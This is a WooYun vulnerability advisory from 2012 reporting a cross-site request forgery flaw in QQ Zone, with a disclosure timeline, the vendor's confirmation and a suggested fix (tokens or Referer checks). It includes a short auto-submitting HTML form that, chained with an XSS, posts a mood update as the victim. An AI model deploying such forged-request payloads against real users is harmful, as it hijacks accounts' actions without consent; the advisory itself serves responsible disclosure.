漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2012-04-09: 细节已通知厂商并且等待厂商处理中
2012-04-09: 厂商已经确认,细节仅向厂商公开
2012-04-19: 细节向核心白帽子及相关领域专家公开
2012-04-29: 细节向普通白帽子公开
2012-05-09: 细节向实习白帽子公开
2012-05-24: 细节向公众公开
简要描述:
QQ空间架构问题导致产生csrf漏洞!
详细说明:
注:这两天看到有类试问题提交到乌云,不知有没重复! 谢谢Xhm1n9技术支持
QQ空间架构问题导致产生csrf漏洞!
利用需要扣扣的一个xss来配合,在xss中引入如下代码即可csrf
<form name=xss action="http://qz.qq.com/cgi-bin/mobile_update_mood" method="POST">
<input type="text" name="con" value="csrf -_-!!"><br>
<input type="text" name="suin" value="10000"><br>
<input type="text" name="reply" value="0"><br>
<input type="text" name="g_tk" value="10000"><br>
<input type="text" name="g_ltk" value="10000"><br>
<input type="submit">
</form>
<script>document.xss.submit()</script>
漏洞证明:
修复方案:
加token或判断referer
版权声明:转载请注明来源 笨小孩@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-04-09 17:51
厂商回复:
非常感谢您的反馈
最新状态:
暂无